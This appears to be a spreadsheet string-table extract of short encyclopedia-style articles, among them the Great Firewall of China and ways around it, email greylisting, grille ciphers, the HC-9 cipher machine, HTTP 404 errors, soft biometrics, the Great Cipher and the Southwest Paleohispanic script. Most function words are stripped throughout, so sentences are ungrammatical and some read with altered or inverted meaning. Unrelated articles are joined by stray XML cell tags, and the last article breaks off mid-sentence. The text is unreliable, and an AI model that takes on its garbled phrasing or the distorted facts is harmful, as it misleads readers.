internet means freedom speech, dissemination campaigns could lead protests government. sensitive content: control information government china. economic protectionism: china prefers local companies regulated chinese regulations, since power them, e.g. baidu google. campaigns crackdowns part great firewall, beginning 2003, china started golden shield project, massive surveillance censoring system, hardware provided mostly u.s. companies, including cisco systems. project completed 2006, carried buildings machines manned civilians supervised china's national police force, public security bureau (psb). main operating procedures gatekeepers golden shield project include monitoring domestic websites, email, searching politically sensitive language calls protest. when damaging content found, local officials dispatched investigate make arrests. however, late 2007, golden shield project proved operate sporadically best, users long adapted internet blocking using proxy servers, among strategies, make communications circumnavigate blocked content.internet cafés, extremely popular getting online developing countries fewer people afford personal computer, regulated chinese government local chinese government officials. minors china, allowed internet cafés, although widely ignored, enforced, spurred creation underground "black bars" visited underage. 2008, internet cafés required register every customer used internet there. these records confiscated either local government officials psb. illustrate local regulation internet cafés, instance, government official town gedong lawfully banned internet cafés operating town believed harmful minors, frequented play online games (including considered violent) surf internet. however, internet cafés town simply went underground, minors deterred visiting them.in 2015, china indefinitely blocked access chinese-language wikipedia. contrast 2018), english-language wikipedia blocked rarely intermittently. 2017, china discussed plans version wikipedia. 2019, language versions wikipedia blocked chinese government. blocking methods active filtering function chinese firewall selectively prevent content accessed. mostly made cisco, huawei, semptian hardware. sensitive content gets blocked; 2007, scholar jedidiah crandall others argued main purpose block 100%, rather flag warn, order encourage self-censorship. illustrative incomplete list tactics includes: active probing addition previously discussed techniques, also using active probing order identify block network services would help escaping firewall. multiple services providers reported receiving unsolicited tcp/ip connections shortly legitimate use, purported purpose network enumeration services, particular tls/ssl services, facilitating blocking. example, shortly request issued legitimate chinese client passes outbound though great firewall hidden great firewall detect activity issue active probe verify nature previously unknown and, probe confirms part blacklisted vpn, blacklist this attack circumvented obfs4 protocol, relies out-of-band shared secret. proxy distribution great firewall scrapes servers official distribution channels, enumerates them. strategy resist attack limit quantity proxy revealed user making difficult users create identity. academics proposed solutions salmon. dynamic quite effective flush blacklists. goals, impact resistance goal firewall article september 2000 document chinese state council, posted xinhua news agency, lists categories information censored, blocked, filtered access citizens using internet within china: opposing basic principles confirmed constitution. jeopardizing security nation, divulging state secrets, subverting state power, jeopardizing integrity nation's unity harming honor interests nation inciting hatred peoples, racism peoples, disrupting solidarity peoples disrupting national policies religion, propagating evil cults feudal superstitions spreading rumors, disturbing social order disrupting social stability spreading obscenity, pornography, gambling, violence, murder, terror, abetting commission crime insulting defaming third parties, infringing legal rights interests third parties containing content prohibited administrative rulesto filter content, chinese government uses blocking methods, also heavily relies internet companies, isps, social media operators weibo, others actively censor users. this results private companies censoring platform filtered content, forcing chinese internet users websites hosted china access information. much information related sensitive topics. great firewall's goal perceived communist party helping protect chinese population preventing users accessing foreign websites which, opinion, host content would 'spiritual pollution', (清除精神污染运动), well information sensitive topics. these topics include: names government leaders, jinping deng xiaoping political movements protests falun gong cults tiananmen square massacre ethnic issues xinjiang internment camps discussions tibetan independencespecific english websites blocked filtered include many popular search engines, social media platforms, information-hosting sites, video-hosting websites google search, facebook, wikipedia, youtube, twitter, many more. impact people china cybersecurity behind firewall targeted helping increase internet user privacy, increased protections personal data, making companies responsible monitoring actors, hopes make safer place internet chinese citizens. despite this, growing criticisms actions chinese government hurt chinese free speech, increased censorship, lack non-sanctioned sources information, wikipedia many english news sources. this resulted reports cases legal persecution charged spreading information.the chinese government legally support free speech; article constitutions people's republic states "citizens people's republic china enjoy freedom speech, press, assembly, association, procession, demonstration." recent decades, many criticisms chinese government found laws often abused. study america claimed "some government's rights-abusive laws aimed criminalizing free speech eyes government encourages subversion, separatism, rejection state’s authority."censorship sensitive topics china also easier government firewall filtering. because monitoring social media chat apps china presents possibility punishment user, discussion topics limited correct thought communist party, one's home private spaces, reducing chance information topics spread, reducing threat protest communist party. according yaqiu wang, prominent human rights researcher, time china internet provided method chinese citizens learn sensitive topics government censored news, access international news reports media coverage. claims that, past years, increasingly difficult access second opinions events, meaning students rarely opportunity learn diverging viewpoints correct thought communist party. economic impacts aside social control aspect, great firewall also acts form trade protectionism allowed china grow internet giants, tencent, alibaba, baidu. china version many foreign properties, example: tencent video (youtube), sina weibo (twitter), qzone (facebook), wechat (whatsapp), ctrip (orbitz others), zhihu (quora). with nearly quarter global internet population (700 million users), internet behind considered "parallel universe" internet exists outside. resistance while great firewall impact chinese citizens' ability internet find information sensitive topics communist party, completely stopped firewall caused much frustration amongst individuals internationally operating companies china, many turned vpns, speaking codes, methods retain access international internet.the vpns china provide individuals access international internet, china, potential legal risk. 2017, chinese government declared unauthorized services illegal. example punishment vera zhou, student university washington, who, visiting parents xinjiang, china, used access school homework. arrested sent xinjiang internment camp october 2017 march 2018, followed house arrest release. able return september 2019. circumvention methods bypassing firewall because great firewall blocks destination addresses domain names inspects data sent received, basic censorship circumvention strategy proxy nodes encrypt data. bypassing firewall known fanqiang (翻墙, "climb wall"), circumvention tools combine mechanisms: proxy servers outside china used, although using simple open proxy (http socks) without also using encrypted tunnel (such https) little circumvent sophisticated censors. freegate, ultrasurf, psiphon, lantern free programs designed experienced circumventing china firewall using multiple open proxies. vpns (virtual private networks) popular tools used westerners bypassing censorship technologies. they basic approaches, proxies, encrypted channels used circumvention tools, depend private host, virtual host, account outside china, rather open, free proxies. partially used china. since 2010, almost bridges torproject.org blocked proxy distribution. still functions china using independently published obfs4 bridges meek. garlic routing useful properties similar tor's anonymity needed. much less popular tor, faced little blocking attempts.non-proxy circumvention strategies include: using encrypted bypass blocking sites including torproject github, used obtain circumvention. 2019 firefox released update make easy enable https. despite encryption, majority services remain blocked ignoring reset packets sent gfw. distinguishing value (time live), routing packets sites triggered blocking behavior. there popular rumour using ipv6 bypasses filtering china. academic community confirm. known blocked methods openvpn protocol detected blocked. connections using symmetric keys using "tls-auth" blocked handshake, connections using "tls-crypt" option detected throttled (under 56kbit/s) filtering system. tunnels protocols (e.g., pptp) blocked. tls, great firewall identify difference https implementations inspecting handshake parameters. outside china exporting great firewall technology reporters without borders suspects countries cuba, iran, vietnam, zimbabwe, belarus obtained surveillance technology china, although censorship countries less stringent china.since least 2015, russian roskomnadzor agency collaborates chinese great firewall security officials implementing data retention filtering infrastructure. opposition critics argued countries begin following china's approach, whole purpose creation internet could jeopardy. like-minded countries successful imposing restrictions inhabitants globalized online companies, free global exchange information could cease exist.the united states trade representative's (ustr) "national trade estimate report" 2016 referred china's digital great firewall: "china's filtering cross-border internet traffic posed significant burden foreign suppliers." claude barfield, american enterprise institute's expert international trade, suggested u.s. government bring case firewall, huge trade barrier, world trade organization january 2017. trafficked websites china blocked great firewall. this created burden foreign suppliers rely websites sell products services. lobby's 2016 business climate survey showed percent members reported negative impact business internet censorship.according stephen rosen, reflective chinese government's fear civil disobedience rebellion among chinese population chinese communist party's rule: want know people worried look spend money you’re afraid burglars burglar alarm. what chinese spending money we’re told chinese figures they’re spending people's armed police, internal security force they’re spending regular military. this whole great firewall china, whole massive effort control internet, effort modern information technology disseminate information, empowering individuals, make people think want think monitor behavior isolate suppress them. that’s regime fundamentally afraid people. it’s fundamentally hostile them. also list websites blocked mainland china bamboo curtain berlin wall censorship wikipedia china great cannon distributed denial-of-service attack tool co-located great firewall. greatfire organization monitoring great firewall. great wall sand censorship china green youth escort internet censorship circumvention international freedom expression exchange monitors internet censorship china media china politics china splinternet controls internet? cypher notes references further reading griffiths, james, "the great firewall china: build control alternative version internet", books (may 2019). nilekani, nandan, "data people: india's inclusive internet", foreign affairs, vol. (september october 2018), 19–26. segal, adam, "when china rules web: technology service state", foreign affairs, vol. (september october 2018), 10–14, 16–18. external links quotations related great firewall wikiquote</t>
  </si>
  <si>
    <t>Greylisting (email)</t>
  </si>
  <si>
    <t>greylisting method defending e-mail users spam. mail transfer agent (mta) using greylisting "temporarily reject" email sender recognize. mail legitimate, originating server delay, sufficient time elapsed, email accepted. works server employing greylisting temporarily rejects email unknown suspicious sources sending reply codes ("please call back later"), defined simple mail transfer protocol (smtp). fully capable smtp implementations expected maintain queues retrying message transmissions cases, legitimate mail delayed, still through.the temporary rejection issued different stages smtp dialogue, allowing implementation store less data incoming message. trade-off work bandwidth exact matching retries original messages. rejecting message content received allows server store choice headers and/or hash message body. addition whitelisting good senders, greylister provide exceptions. greylisting generally overridden fully validated connection matching certificate. because large senders often pool machines send (and resend) email, addresses most-significant bits (/24) treated equivalent, cases records used determine sending pool. similarly, e-mail systems unique per-message return-paths, example variable envelope return path (verp) mailing lists, sender rewriting scheme forwarded e-mail, bounce address validation backscatter protection, etc. exact match sender address required, every e-mail systems delayed. some greylisting systems avoid delay eliminating variable parts verp using sender domain beginning local-part sender address. works greylisting effective mass email tools used spammers queue reattempt mail delivery normal regular mail transport agent. delaying delivery also gives real-time blackhole lists similar lists time identify flag spam source. thus, subsequent attempts likely detected spam mechanisms greylisting delay. advantages main advantage user's point view greylisting requires additional user configuration. server utilizing greylisting configured appropriately, user notice delay first message given sender, long sending email server identified belonging whitelisted group earlier messages. mail sender repeatedly greylisted worth contacting mail system administrator detailed headers delayed mail. from mail administrator's point view benefit twofold. greylisting takes minimal configuration running occasional modifications local whitelists. second benefit rejecting email temporary error (actual error code implementation dependent) cheap system resources. most spam filtering tools intensive users memory. stopping spam hits filtering processes, fewer system resources used. disadvantages delayed delivery issues biggest disadvantage greylisting unrecognized servers, destroys near-instantaneous nature email users come expect. mail unrecognized servers typically delayed minutes, could delayed days poorly configured sending systems. explaining users become accustomed immediate email delivery probably convince mail server uses greylisting behaving correctly. this particular problem websites require account created email address confirmed used user greylisting mailserver attempts reset credentials website uses email confirmation password resets. sending site poorly configured, greylisting delay initial email link. extreme cases, delivery delay imposed greylister exceed expiry time password reset token delivered email. cases, manual intervention required whitelist website's mailserver email containing reset token used expires. when mail server greylisted, duration time initial delay retransmission variable; greylisting server control visibility delay. smtp says retry interval least minutes, give-up time needs least days; actual values vary widely different mail server software.modern greylisting applications (such postgrey unix-like operating systems) automatically whitelist senders prove capable recovering temporary errors, regardless reputed spamminess sender. implementation also generally include ability manually whitelist mailservers. 2007 analysis greylisting considers totally undesirable delay mail, unreliable greylisting becomes widespread, junkmailers adapt systems around conclusion purpose greylisting reduce amount spam server's spam-filtering software needs analyze, resource-intensively, save money servers, reduce spam reaching users. conclusion: "[greylisting] very, annoying. much annoying spam." other problems current smtp specification (rfc 5321) clearly states "the smtp client retains responsibility delivery message" (section 4.2.5) "mail cannot transmitted immediately must queued periodically retried sender." (section 4.5.4.1). most mtas therefore queue retry messages, small number not. these typically handled whitelisting exception lists. also, legitimate mail might delivered retry comes different address original attempt. when source email server farm goes kind relay service, likely server original make next attempt. network fault tolerance, belong completely unrelated address blocks, thereby defying simple technique identifying significant part address. since addresses different, recipient's server fail recognize series attempts related, refuse turn. this continue message ages queue number servers large enough. this problem partially bypassed proactively identifying exceptions server farms. likewise, exception configured multihomed hosts hosts using dhcp. extreme case, sender could (legitimately) different ipv6 address outbound smtp connection. sender server subjected greylisting might also reattempt delivery another receiving mailserver receiving domain record. this cause problems hosts implement greylisting policy share database. also nolisting bandwidth throttling tarpit (networking) references external links greylisting whitepaper evan harris greylisting implementation netqmail microsoft exchange greylisting problems newsgroup article 6647 internet engineering task force, june 2012: standardizes current state</t>
  </si>
  <si>
    <t>Grille (cryptography)</t>
  </si>
  <si>
    <t>history cryptography, grille cipher technique encrypting plaintext writing onto sheet paper pierced sheet paper cardboard similar). earliest known description polymath girolamo cardano 1550. proposal rectangular stencil allowing single letters, syllables, words written, later read, various apertures. written fragments plaintext could disguised filling gaps fragments anodyne words letters. this variant also example steganography, many grille ciphers. cardan grille variations cardan grille invented method secret writing. word cryptography became familiar term secret communications middle 17th century. earlier, word steganography common. general term secret writing cypher also spelt cipher. there modern distinction cryptography steganography francis bacon gave three fundamental conditions ciphers. paraphrased, are: cipher method difficult possible others recover plaintext (called 'reading cipher') cases, presence messages suspectedit difficult fulfil three conditions simultaneously. condition applies steganography. bacon meant cipher message should, cases, appear cipher all. original cardan grille aim. variations cardano original, however, intended fulfill condition generally failed meet condition well. but, ciphers ever achieved second condition, point generally cryptanalyst's delight whenever grille ciphers used. attraction grille cipher users lies ease (condition short, simple. single-letter grilles ciphers used communication others: records reminders kept cipher author alone. grille easily usable protection brief information word number use. example, grille eight irregularly placed (ideally randomly) holes equal length word tangiers. grille placed gridded sheet (not required actual practice) letters written bottom. removing grille, grid filled random letters numbers. then, hopes, possessor grille copy read hidden letters numbers could, example, polyalphabetic cipher proposed around time giambattista della porta. grille grid kept separately. copy grille grid, loss either results loss both. clearly, case communication grille cipher, sender recipient must possess identical copy grille. loss grille leads probable loss secret correspondence encrypted grille. either messages cannot read (i.e., decrypted) someone else (with lost grille) reading them. grille suggested: method generating pseudo-random sequences pre-existing text. this view proposed connection voynich manuscript. area cryptography david kahn termed enigmatology touches works john ciphers supposedly embedded works shakespeare proving francis bacon wrote them, william friedman examined discredited. trellis ciphers elizabethan spymaster francis walsingham (1530–1590) reported used "trellis" conceal letters plaintext communication agents. however, generally preferred combined code-cipher method known nomenclator, practical state-of-the-art day. trellis described device spaces reversible. appears transposition tool produced something much like rail fence cipher resembled chess board. cardano known proposed variation, chess player wrote book gaming, pattern would familiar him. whereas ordinary cardan grille arbitrary perforations, method cutting holes applied white squares chess board regular pattern results. encipherer begins board wrong position chess. each successive letter message written single square. message written vertically, taken horizontally vice versa. after filling letters, board turned degrees another letters written (note flipping board horizontally vertically equivalent). shorter messages filled null letters (i.e., padding). messages longer letters require another turn board another sheet paper. plaintext short, square must filled entirely nulls. this transposition method produces invariant pattern satisfactorily secure anything cursory notes. second transposition needed obscure letters. following chess analogy, route taken might knight's move. path agreed upon, reverse spiral, together specific number nulls start message. turning grilles rectangular cardan grilles placed four positions. trellis chessboard positions, gave rise sophisticated turning grille four positions rotated directions. baron edouard fleissner wostrowitz, retired austrian cavalry colonel, described variation chess board cipher 1880 grilles adopted german army world these grilles often named fleissner, although took material largely german work, published tübingen 1809, written klüber attributed form grille cardano, helen fouché gaines.bauer notes grilles used 18th century, example 1745 administration dutch stadthouder william later, mathematician hindenburg studied turning grilles systematically 1796. '[they]are often called fleissner grilles ignorance historical origin.' form fleissner fleißner) grille makes perforations grid holes quadrant. squares quadrant numbered numbers must used only. this allows many variations placing apertures. grille four positions north, east, south, west. each position exposes squares. encipherer places grille sheet writes first letters message. then, turning grille degrees, second written, grid filled. possible construct grilles different dimensions; however, number squares quadrant odd, even total even number, quadrant section must contain extra perforation. illustrations fleissner grille often take example ease space; number apertures quadrant three quadrants contain apertures quadrant must there standard pattern apertures: created user, accordance description, intention producing good mix. method gained wide recognition jules verne used turning grille plot device novel mathias sandorf, published 1885. verne come across idea fleissner's treatise handbuch kryptographie appeared 1881. fleissner grilles constructed various sizes world used german army 1916. each grille different code name:- anna; berta; clara; dora; emil; 10x10 franz. their security weak, withdrawn four months. another method indicating size grille insert code start cipher text: grille also rotated either direction starting position need north. clearly working method arrangement sender receiver operated accordance schedule. following examples, cipher texts contain message. they constructed example grille, beginning north position, formed rotating grille clockwise anticlockwise. ciphertext taken grid horizontal lines could equally taken vertically. clockwise itit iloh gehe tcdf lens iist fanb fset epes henn urre neen trcg pr&amp;i odct sloe anticlockwise leit ciah gthe tidf lenb iiet fons fsst ures nedn epre heen trtg proi onec sl&amp;c 1925 luigi sacco italian signals corps began writing book ciphers included reflections codes great war, nozzioni crittografia. observed fleissner's method could applied fractionating cipher, delastelle bifid four-square, considerable increase security. grille ciphers also useful device transposing chinese characters; avoid transcription words alphabetic syllabic characters ciphers (for example, substitution ciphers) applied. after world machine encryption made simple cipher devices obsolete, grille ciphers fell disuse except amateur purposes. yet, grilles provided seed ideas transposition ciphers reflected modern cryptography. unusual possibilities d'agapeyeff cipher unsolved d'agapeyeff cipher, challenge 1939, contains 14x14 dinomes might based sacco's idea transposing fractionated cipher text means grille. third-party grille: crossword puzzle distribution grilles, example difficult problem exchange, eased taking readily-available third-party grid form newspaper crossword puzzle. although strictly grille cipher, resembles chessboard black squares shifted used cardan manner. message text written horizontally white squares ciphertext taken vertically, vice versa. ctati ettol ttoeh rrhei mucke sseel audue ritsc visch nrehe leerd dtohs esdnn lewac leont oiiea rrset llpdr eivyt elttd toxea e4tmi giuod ptrt1 encne abymo noeet ebcal luziu tlept sifnt onuyk yoooo again, following sacco's observation, method disrupts fractionating cipher seriated playfair. crosswords also possible source keywords. grid size illustrated word month, squares numbered. cryptanalysis original cardano grille literary device gentlemen's private correspondence. suspicion lead discoveries hidden messages hidden messages exist all, thus confusing cryptanalyst. letters numbers random grid take shape without substance. obtaining grille chief goal attacker. lost grille copy can't obtained. later variants cardano grille present problems common transposition ciphers. frequency analysis show normal distribution letters, suggest language plaintext written. problem, easily stated though less easily accomplished, identify transposition pattern decrypt ciphertext. possession several messages written using grille considerable aid. gaines, standard work hand ciphers cryptanalysis, gave lengthy account transposition ciphers, devoted chapter turning grille. also topics cryptography references further reading external links</t>
  </si>
  <si>
    <t>Group key</t>
  </si>
  <si>
    <t>cryptography, group cryptographic shared group users. typically, group keys distributed sending individual users, either physically, encrypted individually user using either user's pre-distributed private key. common group keys allow group users decrypt broadcast message intended entire group users, else. example, second world war, group keys (known "iodoforms", term invented classically educated non-chemist, nothing chemical name) sent groups agents special operations executive. these group keys allowed agents particular group receive single coded message. present-day applications, group keys commonly used conditional access systems, common used decrypt broadcast signal, group question group paying subscribers. case, group typically distributed subscribers' receivers using combination physically distributed secure cryptoprocessor form smartcard encrypted over-the-air messages. references</t>
  </si>
  <si>
    <t>Guardhouse</t>
  </si>
  <si>
    <t>guardhouse (also known watch house, guard building, guard booth, guard shack, security booth, security building, sentry building) building used house personnel security equipment. guardhouses historically dormitories sentries guards, places sentries posted sentry posts wait call", recently staffed contracted security company. some guardhouses also function jails. modern guardhouses 21st century commercial, industrial, institutional, governmental, residential facilities, guardhouses generally placed entrance checkpoints securing, monitoring maintaining access control secured facility. case small mid-sized facilities, generally, entire physical security envelope controlled guardhouse. general orders sentry united states navy marine corps "repeat calls distant guardhouse own." guardhouses thus serve central communications hubs outlying sentry posts, corporal guard stationed. when sentries relieved replacements, sentry stationed guardhouse, designated "no. conventionally relieved first.modern guardhouses manufactured welded, galvanized steel construction, insulated, include heat light, degree visibility, also bullet resistant. these guardhouses keep security guards comfortable well secure. first modern guardhouse manufactured par-kut international 1954. 21st century, guardhouses provided options exterior floodlights, reflective bullet resistant glass, ports, elevated platforms, highly mobile trailer mounting, anti fatigue floor mats, dimmable interior light built bathroom. historical guardhouses fortress louisbourg 18th century, guardhouses sentries stationed sleep periods sentry duty sentry posts around town. town five guardhouses (the dauphine gate, townside entrance king's bastion, queen's gate, maurepas gate, pièce grave), whilst sleeping sentries would call" guardhouses need.in guardhouse fort scott national historic site, typical furnishings guard quarters included benches, tables, shelves, platform resting assignments, arms racks, fireplace stove, leather buckets (used firefighting another duty guards). prison cells unfurnished, containing simply slop bucket iron rings walls attachment shackles. also gatehouse neue wache kōban guardhouse, mountain montana guard tower references further reading "the guardhouse". colonial williamsburg. colonial williamsburg foundation. description guardhouse colonial williamsburg lindsay, charles (1975). "louisbourg guardhouses". canadian historic sites: occasional papers archaeology history contributions fortress louisbourg. ottawa: parks canada. (2). archived original 2007-03-22. "history aths guardhouse". arsenal technical high school alumni association. archived original 2006-10-19. description guardhouse arsenal technical high school, tracing history combined guardhouse jail u.s. army barracks school "beanery" current function school security office kate holmes (1979). "windsor barracks guardhouse". australian society historical archaeology. {{cite journal}}: cite journal requires |journal= (help) archaeological report guardhouse macquarie street entrance lancer barracks parramatta, south wales "guardhouse". tour museum. fort concho national historic landmark. archived original 2006-10-20. extract fort concho medical history record 1871, describing detail nonexistent guardhouse</t>
  </si>
  <si>
    <t>HC-9</t>
  </si>
  <si>
    <t>hc-9 mechanical cipher device manufactured swedish company transvertex. designed early 1950's swedish armed forces likely remained 1970s. this machine used low-level communications platoon, company, battalion levels regimental brigade staffs.the machine dimensions operation hc-9 made punched cards instead pin-wheel mechanisms machines (for example, hagelin m-209). external links photograph hc-9 another hc-9 photograph description description machine simulator qbasic discussion machine's operation references cipher deavours louis kruh, swedish hc-9 ciphering machine, cryptologia, vol. 13(3), july 1989, 251–265 cipher deavours louis kruh, swedish hc-9 ciphering machine challenge, cryptologia, vol. 14(2), april 1990, 139–144 greenough, cryptanalysis swedish hc-9: known-plaintext approach, cryptologia, 1997, 21(4), pp353–367.</t>
  </si>
  <si>
    <t>HTTP 404</t>
  </si>
  <si>
    <t>computer network communications, http 404, found, 404, error, page found file found error message hypertext transfer protocol (http) standard response code, indicate browser able communicate given server, server could find requested. error also used server wish disclose whether requested information.the website hosting server typically generate "404 found" page user attempts follow broken dead link; hence error recognizable errors encountered world wide web. overview when communicating http, server required respond request, browser request page, numeric response code optional, mandatory, disallowed (based upon status code) message. code 404, first digit indicates client error, mistyped uniform resource locator (url). following digits indicate specific error encountered. http's three-digit codes similar codes earlier protocols nntp. http level, response code followed human-readable "reason phrase". http specification suggests phrase "not found" many servers default issue html page includes code "not found" phrase. error often returned pages moved deleted. first case, better employ mapping redirection returning moved permanently response, configured server configuration files, rewriting; second case, gone returned. because options require special server configuration, websites make them. errors confused errors, appear given refers server name exist. error indicates server found, server able retrieve requested page. soft errors some websites report "not found" error returning standard page "200 response code, falsely reporting page loaded properly; known soft 404. term "soft 404" introduced 2004 bar-yossef al.soft 404s problematic automated methods discovering whether link broken. some search engines, like yahoo google, automated processes detect soft 404s. soft 404s occur result configuration errors using certain http server software, example apache software, error document (specified .htaccess file) specified absolute path (e.g. http://example.com/error.html) rather relative path (/error.html). this also done purpose force browsers (like internet explorer) display customized error message rather replacing served browser-specific "friendly" error message internet explorer, behavior triggered served received html shorter certain length, manually disabled user). there also "soft 3xx" errors content returned status comes redirected page, missing pages redirected domain root/home page. proxy servers some proxy servers generate error 500-range error code would correct. proxy server unable satisfy request page problem remote host (such hostname resolution failures refused connections), described internal server error, might deliver instead. this confuse programs expect specific responses, longer easily distinguish absent server missing page server present. intentional 404s july 2004, telecom provider group deployed cleanfeed content blocking system, returns error request content identified potentially illegal internet watch foundation. other isps return http "forbidden" error circumstances. practice employing fake errors means conceal censorship also reported thailand tunisia. tunisia, censorship severe 2011 revolution, people became aware nature fake errors created imaginary character named "ammar 404" represents "the invisible censor". microsoft internet server substatus error codes webserver software developed microsoft, microsoft's internet information services (iis), returns substatus codes responses. substatus codes take form decimal numbers appended status code. substatus codes officially recognized iana returned non-microsoft servers. substatus codes microsoft's 7.0, 7.5, servers define following http substatus codes indicate specific cause error: 404.0 found. 404.1 site found. 404.2 isapi restriction. 404.3 mime type restriction. 404.4 handler configured. 404.5 denied request filtering configuration. 404.6 verb denied. 404.7 file extension denied. 404.8 hidden namespace. 404.9 file attribute hidden. 404.10 request header long. 404.11 request contains double escape sequence. 404.12 request contains high-bit characters. 404.13 content length large. 404.14 request long. 404.15 query string long. 404.16 request sent static file handler. 404.17 dynamic content mapped static file handler wildcard mime mapping. 404.18 query string sequence denied. 404.19 denied filtering rule. 404.20 many segments. custom error pages servers typically configured display customised error page, including natural description, parent site's branding, sometimes site map, search form 404-page widget. protocol level phrase, hidden user, rarely customized. internet explorer, however, display custom pages unless larger bytes, opting instead display "friendly" error page. google chrome included similar functionality, replaced alternative suggestions generated google algorithms, page bytes size. another problem page provide favicon, separate custom 404-page exists, extra traffic longer loading times generated every page view.many organizations error pages opportunity inject humor otherwise serious website. example, metro shows polar bear skateboard, development agency left logic simple drawing program. during 2015 general election campaign main political parties used pages either take political opponents show relevant policies potential supporters. europe, notfound project, created multiple european organizations including missing children europe child focus, encourages site operators snippet code serve customized error pages provide data missing children.while many websites send additional information error message—such link homepage website search box—some also endeavor find correct page user wanted. extensions available content management systems (cmss) this. tracking errors number tools exist crawl website find pages return status codes. these tools helpful finding links exist within particular website. limitation tools find links within particular website, ignore 404s resulting links websites. result, tools miss 404s websites. around find errors analyzing external links.one effective ways discover errors using google search console, google analytics crawling software. another common method tracking traffic pages using file analysis. this useful understand 404s users reached site. another method tracking traffic pages using javascript-based traffic tracking tools. also blue screen death funky caching link list http status codes references external links more useful found hypertext transfer protocol (http/1.1): semantics content specification, internet engineering task force errordocument directive instructions custom error pages apache server 404: found award-winning song error code</t>
  </si>
  <si>
    <t>HTTP 500</t>
  </si>
  <si>
    <t>Soft biometrics</t>
  </si>
  <si>
    <t>soft biometrics traits physical, behavioural adhered human characteristics, classifiable pre–defined human compliant categories. these categories are, unlike classical biometric case, established time–proven humans differentiating individuals. words soft biometric traits instances created natural way, used humans distinguish peers. introduction beginnings soft biometrics identified laid alphonse bertillon 19th century. first proposed personal identification system based biometric, morphological anthropometric determinations. common traits introduced colour eye, hair, beard skin; shape size head; body characteristics like height weight well indelible marks birth marks, scars tattoos. majority descriptors presently fall category soft biometrics. jain lately redefined soft biometrics traits providing information individual, though able individually authenticate subject lack distinctiveness permanence. further research shown larger soft biometric traits used identify individuals. redefinition soft biometrics proposed reid nixon characteristic naturally described humans. such soft biometrics well suited deployment surveillance applications research ongoing capitalise developments. soft biometric traits traits accept definition include, limited physical: skin colour, colour, hair colour, presence beard moustache, height, weight, gender, race, ethnicity, wrinkles. behavioural: gait, keystroke, signature. adhered human characteristics: clothes colour, tattoos, accessories.soft biometrics inherit main part advantages biometrics furthermore endorses assets. some advantages include obtrusiveness, computational, time efficiency human compliance. furthermore, require enrollment, consent cooperation observed subject. usage soft biometrics used identify humans combined biometric authentication systems increase amount accuracy recognition. example visual surveillance, soft biometric information help identify people inconsistencies faces captured poorly camera. also biometrics private biometrics surveillance anthropometry biometric passport biometrics schools references further reading soft biometric traits assist user recognition?. published spie 2004. "ross al.", handbook multibiometrics, international series biometrics, vol. springer 2006. facial marks: soft biometric face recognition. published icip 2009. weight estimation visual body appearance published btas 2010. soft biometrics systems reliability asymptotic bounds. published btas 2010. color based soft biometry hooligans detection. published iscas 2010. person recognition using facial soft biometrics (bofsb). published mmsp 2010.</t>
  </si>
  <si>
    <t>Great Cipher</t>
  </si>
  <si>
    <t>great cipher (french: grand chiffre) nomenclator cipher developed rossignols, several generations served french monarchs cryptographers. great cipher named excellence reputed unbreakable. modified forms french peninsular army summer 1811. after fell current use, many documents french archives unreadable decoded. historical background antoine rossignol's cryptographic skills became known 1626, encrypted letter taken messenger leaving city réalmont, controlled huguenots surrounded french army. letter stated huguenots would able hold city much longer, day, rossignol successfully deciphered french returned letter deciphered message forced huguenots surrender. son, bonaventure rossignol, soon appointed prominent roles court. together, devised cipher strong baffled cryptanalysts centuries. commandant étienne bazeries managed break cipher around 1893 period three years realising number stood french syllable, rather single letters, unlike traditional ciphers. guessed particular sequence repeated numbers, 124-22-125-46-345, stood ennemis ("the enemies") information able unravel entire cipher. iron mask encrypted letters louis marshal nicolas catinat appeared possible solution mystery iron mask. letter concerned general named vivien bulonde attack italian town cuneo instead fled, fearing arrival austrians, consequently serious danger success entire french campaign piedmont. letter said: majesty knows better person consequences act, also aware deeply failure take place prejudice cause, failure must repaired winter. majesty desires immediately arrest general bulonde cause conducted fortress pignerole, locked cell guard night, permitted walk battlement 309.the "330" "309" codegroups appeared correspondence, impossible confirm stand for. bazeries verified general bulonde disgraced removed command, reasoned stood masque full stop. however, none cipher variants used iron mask period included masque, unlikely word include cipher's small repertory. technical nature basis code cracked bazeries numbers stood syllables. there variations, louis xiv's overseas ministers sent different code sheets encrypted syllables also letters words. counter frequency analysis, number sets "nulls", meant ignored intended recipient. others traps, including codegroup meant ignore previous codegroup.as nomenclator cipher, great cipher replaced names generals auguste marmont, references ennemis sensitive terms homophonic substitutions. code sheets included alternative digits modify gender letter case rules french composition held true encryptions well. since commonly used letter french, cipher typically allocated code numbers writing vowel. nomenclature, code numbers stood references sources kahn, david. "the iron mask encore efin, cryptologically." cryptologia, january 2005, volume xxix, number singh, simon. code book: science secrecy ancient egypt quantum cryptography. york: anchor books, 1999. isbn 0-385-49532-3. urban, mark. "the blockade ciudad rodrigo, june november 1811 great cipher." broke napoleon's codes. harper perennial, 2003. isbn 978-0-06-093455-2.</t>
  </si>
  <si>
    <t>Southwest Paleohispanic script</t>
  </si>
  <si>
    <t>southwest script southwestern script, also known tartessian south lusitanian, paleohispanic script used write unknown language usually identified tartessian. southwest inscriptions found mainly southwestern quadrant iberian peninsula, mostly south portugal (algarve southern alentejo), also spain southern extremadura western andalucia). name script name script controversial. neutral name southwestern, refers geographic location. some ethnolinguistic names given script include: tartessian, considering script language spoken tartessos. this considered unlikely four hundred inscriptions currently known found tartessos' area influence. south lusitanian, almost southwest inscriptions found south portugal area included roman province lusitania. however, name wrongly suggest relation lusitanian language. escrita cónia, greek roman sources locate pre-roman conii cynetes area stele found. bastulo-turdetanian. deciphering strategies unlike northeastern iberian script, deciphering southwestern script closed case southeastern iberian script). main approaches deciphering phonetic value letters consisted comparative approach: searching similar letters southwestern script phoenician abjad paleoiberian scripts (namely scripts). then, phonetic value compared. letter appears phoenician origin similar phonetic value phoenician paleoiberian scripts, phonetic value assumed southwestern script. internal analysis: searching aspects language itself, frequency relationship letters.if approaches coincide, letter considered deciphered not, considered hypothetical. 2014, letters considered consensual (all vowels, stops non-stops), others (10+) still hypothetical. three main hypotheses correa (2009), (2010), ramos (2002).because phonetic deciphering stage finished, difficult establish language script used represent. some suggested celtic origin, idea consensual. hypothesis correct, though, southwest script language would first celtic language written. main hypotheses language iberian point non-indo-european) language celt influence, iberian origin. writing system excepting greco-iberian alphabet, lesser extent script, paleoiberian scripts shared distinctive typology: behaved syllabary stop consonants alphabet remaining consonants vowels. this unique writing system called semi-syllabary. there agreement paleohispanic semi-syllabaries originated; typically agreed origin linked phoenician abjad, believe greek alphabet influence. southwest script, though letter used write stop consonant determined following vowel, full semi-syllabary, following vowel also written, alphabet. similar convention found etruscan /k/, written depending following 